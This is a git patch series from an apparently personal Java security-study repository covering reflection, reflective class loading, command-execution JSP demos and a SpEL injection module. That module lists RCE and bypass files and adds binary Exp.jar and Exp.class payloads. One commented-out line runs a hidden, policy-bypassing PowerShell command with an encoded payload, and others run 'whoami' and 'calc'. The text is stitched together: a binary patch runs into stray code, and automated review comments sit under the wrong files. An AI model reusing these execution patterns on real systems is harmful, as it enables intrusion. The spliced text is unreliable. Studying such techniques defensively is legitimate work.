diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java"
new file mode 100644
index 0000000..0620b0c
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java"
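Review bot: `Baka.class.newInstance()` on the last active line of main is deprecated since Java 9 because it rethrows any checked exception from the constructor unwrapped; `Baka baka = Baka.class.getDeclaredConstructor().newInstance();` is the replacement and still triggers the static initializer plus the no-arg constructor that the trailing comment describes. `Class bakaClass = Baka.class;` is a raw type that is never read, so either drop it or declare it as `Class<Baka>`. The nine commented-out lines are the experiments the file exists to demonstrate; rather than dead code, a short Javadoc on `main` listing which call triggers initialization and which does not would keep the lesson readable. Baka itself, including the static initializer this relies on, is outside this hunk.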
@@ -0,0 +1,27 @@
+package com.test.study;
+
+import java.io.IOException;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+
+public class define2Load {
+ public static void main(String[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, InstantiationException, ClassNotFoundException {
+ ClassLoader classLoader = define2Load.class.getClassLoader();
+ byte[] bytes = Files.readAllBytes(Paths.get("Student.class"));
+ Class clazz = ClassLoader.class;
+// Constructor declaredConstructor = clazz.getDeclaredConstructor();
+// declaredConstructor.setAccessible(true);
+// ClassLoader classLoader = declaredConstructor.newInstance();
+ Method defineClass = clazz.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
+ defineClass.setAccessible(true);
+ Class student = (Class) defineClass.invoke(classLoader, bytes, 0, bytes.length);
+// Class.forName("com.test.pojo.Student");
+ student.newInstance();
+// Class.forName("com.test.pojo.Student");
+ }
+
+
+}
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java"
new file mode 100644
index 0000000..3dff7e4
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java"
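Review bot: `defineClass.setAccessible(true)` targets a protected method of `java.lang.ClassLoader`, which JDK 16 and later strongly encapsulate by default, so this line is expected to fail with `InaccessibleObjectException` rather than run; the class should document which JDK release the demo targets (the ClassLoadStudy pom is only partially visible on this page, so I cannot confirm what it configures). `Files.readAllBytes(Paths.get("Student.class"))` resolves against the working directory with no existence check, which makes the demo silently depend on where it is launched from; loading the bytes through `define2Load.class.getResourceAsStream(...)` or documenting the expected working directory would remove that dependency. `import java.lang.reflect.Constructor` is unused, `Class clazz` and `Class student` are raw types, and `student.newInstance()` is deprecated since Java 9 in favour of `getDeclaredConstructor().newInstance()`. The class names `define2Load` here and `tmp` in the following hunk do not follow Java's UpperCamelCase convention for types.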
@@ -0,0 +1,7 @@
+package com.test.study;
+
+public class tmp {
+ public static void main(String[] args) throws ClassNotFoundException {
+ Class.forName("com.test.pojo.Student");
+ }
+}
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.gitignore"
similarity index 100%
rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore"
rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.gitignore"
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/encodings.xml"
similarity index 100%
rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml"
rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/encodings.xml"
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/misc.xml"
similarity index 100%
rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml"
rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/misc.xml"
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/vcs.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/vcs.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/workspace.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/workspace.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/pom.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/pom.xml" 
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ExecFailed.java" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ExecFailed.java" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/WEB-INF/web.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/WEB-INF/web.xml" 
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/index.jsp" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/index.jsp" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/processBuilder.jsp" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/processBuilder.jsp" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime.jsp" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime.jsp" 
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime2.jsp" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime2.jsp" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.gitignore" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.gitignore" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/.gitignore" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/.gitignore" 
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/encodings.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/encodings.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/misc.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/misc.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/vcs.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/vcs.xml" 
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/1.txt" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/1.txt" new file mode 100644 index 0000000000000000000000000000000000000000..ca9053508c38ce794241a50d536ce683f2f662f4 GIT binary patch literal 8 PcmezW&yazafr|kE5MTmE literal 0 HcmV?d00001 diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/pom.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/pom.xml" 
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" similarity index 97% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" index c54b471..63aed70 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" @@ -1,6 +1,6 @@ package com.test.pojo; -public class Baka { +public class Baka extends Object{ public String name; protected int gender; private int age; 
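Review bot: `extends Object` on the new `Baka` declaration is redundant — a class with no explicit superclass already extends `java.lang.Object`, and `getSuperclass()` reports it either way, so the change alters nothing observable. If the intent is to make the inheritance visible for the reflection exercise, a comment does that without the noise: `public class Baka { // superclass is java.lang.Object (implicit)`. The rest of the class body lies outside the hunk.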
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.class" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.class" new file mode 100644 index 0000000000000000000000000000000000000000..94ba715c97193a50cd3e6ed25bd6504183974d4f GIT binary patch literal 881 zcmZva?N8HC6vm&s&9y5XjIqL;3KK*&5b6uQBoMzCO^8#7TQq*NyStekUGHpf75^eX z>jyBJ=y(4p^|X{R6Vv4O-gC}#e$RdR_50fo0NZ$AU>cVSxQr`077Z++Zs01Gb*#ky zYZ_KHTsKg_nvRB!riOJ58w?q@$H4X&^1H6@s)r2OM)M^@?vd;XhMAV@i|5g>D}s*G z^(azoD~BIGb4JNJX|u|p?{Y8I8*Lc{Ts(2(YO}4Pp77PyzN$Sjei8Y~9g1->2H$6>oB>1SD3{l}p5%uNnlF_YIdl#dmqS~LP}w6nkak+mP&#kD z-yI09{t2}|hDr?S;ABJzt99n?AaH%vR)KJaI}@fS!o(iMMIPC=8mGc!1Eg~O{!V-m zv*+w|TMR~DsPV#TG$)j4n1DHPBsjy`|N2e{4g$$V7?PkmS=o6T$Pe+2lL>l2MS5NU zJr~TNM6(Rd=`v}Yqt!cPDFUplpMZTqrkp)S?kg^o^T*I$eL}JI9fj8$Coq0~CW#3P zRp=zCkZ2JajXHAlI897ZZkn 1.txt").getInputStream(); +// System.out.println(IOUtils.toString(inputStream)); +// inputStream = Runtime.getRuntime().exec("powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ZQBjAGgAbwAgADEAIAA+ACAAMQAuAHQAeAB0AA==").getInputStream(); + } +} 
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java"
similarity index 100%
rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java"
rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java"
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java"
new file mode 100644
index 0000000..c883171
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java"
@@ -0,0 +1,16 @@
+package com.test.study;
+
+import org.apache.commons.io.IOUtils;
+
+import java.io.IOException;
+import java.io.InputStream;
+
+public class tmp {
+ public static void main(String[] args) throws IOException {
+// Runtime runtime = new Runtime();
+// runtime.exec("calc");
+ Process exec = Runtime.getRuntime().exec("whoami");
+ InputStream inputStream = exec.getInputStream();
+ System.out.println(IOUtils.toString(inputStream));
+ }
+}
From 23918ddcef93bcb999eb5396ac460a99c9e27785 Mon Sep 17 00:00:00 2001
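Review bot: `IOUtils.toString(inputStream)` on the last statement of `main` decodes the process output with the platform default charset, and that charset-less overload is deprecated in recent commons-io releases; pass the encoding explicitly, `IOUtils.toString(inputStream, StandardCharsets.UTF_8)` (or whatever the console on the host emits), and wrap the stream in try-with-resources so it is closed. The `Process` is never waited on, so its exit status is discarded; `exec.waitFor()` after reading the stream makes the outcome observable. The class name `tmp` also breaks the UpperCamelCase convention the other files in this commit follow (`Baka`, `Ways2Class`).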
From: 1diot9 <2868944833@qq.com> Date: Tue, 14 Oct 2025 13:37:57 +0800 Subject: [PATCH 10/16] =?UTF-8?q?update:=E6=9B=B4=E6=96=B0SPEL=E4=BB=A3?= =?UTF-8?q?=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../SPEL/.gitignore" | 38 ++++++++++ .../SPEL/.idea/.gitignore" | 8 ++ .../SPEL/.idea/encodings.xml" | 7 ++ .../SPEL/.idea/misc.xml" | 14 ++++ .../SPEL/.idea/vcs.xml" | 6 ++ .../SPEL/pom.xml" | 30 ++++++++ .../SPEL/src/main/java/Exp.jar" | Bin 0 -> 863 bytes .../SPEL/src/main/java/aaa/bbb/Exp.class" | Bin 0 -> 595 bytes .../main/java/com/spring/WebApplication.java" | 7 ++ .../spring/controller/TestController.java" | 32 ++++++++ .../src/main/java/com/test/BasicUsage.java" | 26 +++++++ .../src/main/java/com/test/BypassTrick.java" | 16 ++++ .../src/main/java/com/test/ClassPathXml.java" | 9 +++ .../SPEL/src/main/java/com/test/RceEcho.java" | 46 ++++++++++++ .../src/main/java/com/test/RcePart1.java" | 69 ++++++++++++++++++ .../src/main/java/com/test/RcePart2.java" | 41 +++++++++++ .../SPEL/src/main/java/com/test/tmp.java" | 11 +++ .../SPEL/src/main/resources/1.xml" | 6 ++ .../SPEL/src/main/resources/application.yml" | 2 + 19 files changed, 368 insertions(+) create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.gitignore" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/.gitignore" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/encodings.xml" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/misc.xml" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/vcs.xml" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/pom.xml" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/Exp.jar" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/aaa/bbb/Exp.class" create mode 100644 
"\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BypassTrick.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/ClassPathXml.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/tmp.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/1.xml" diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.gitignore" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/.gitignore" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/encodings.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/encodings.xml" 
@@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/misc.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/misc.xml" new file mode 100644 index 0000000..d23f859 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/vcs.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/vcs.xml" new file mode 100644 index 0000000..b2bdec2 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/vcs.xml" @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/pom.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/pom.xml" new file mode 100644 index 0000000..60f55d4 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/pom.xml" @@ -0,0 +1,30 @@ + + + 4.0.0 + + com.test + SPEL + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.springframework.boot + spring-boot-starter-web + 2.7.15 + + + org.apache.commons + commons-io + 1.3.2 + + + + \ No newline at end of file 
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/Exp.jar" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/Exp.jar" new file mode 100644 index 0000000000000000000000000000000000000000..e7a8d7c2f5db3732fd80915e1631cd09d4d08f69 GIT binary patch literal 863 zcmWIWW@Zs#;Nak3=%4Ew&42_r8CV#6T|*poJ^kGD|D9rBU}gyLX6FE@V1g~(iM@{WVhpE(~ ztSI$}snf13`ZF=xJj>+Oz5by5$Opx0Gf&!npI7~EPGxm{4daHUB(6-JWd<#YeS*BK zyo&=(jv1aaoY>Un*{9i;$yR#y>z#tRiuobuk4!btZwWVFYf!NFSJuY~iu)eU_h`Gf z>h;OFVTY$3Y}}yFaWZ0I!MW|On}y4N^-f@LKJ_WOQQ7?N3a`~$W6sJ)^3r#$rF1&S)*p+_vpA6W+~>9Cnb0? z6SEjOD&&i-uFncPDLU(NqCwB&`k3ErZ&~*# z>+5$K{<(X<`SOANeL2eAhP^NLFFKm>`ox8s&VkaLM_%aZ-fgyZ2%Imt`sk*@)nez> z)5&2GryTOKYIyhzj883zRs~ zwIU}FP+~*?TObpz6)9;Vn*d5k$PNP~Bm_7NWMU+%0B=?{kP>Df+ykV0!43xic+?p% literal 0 HcmV?d00001 
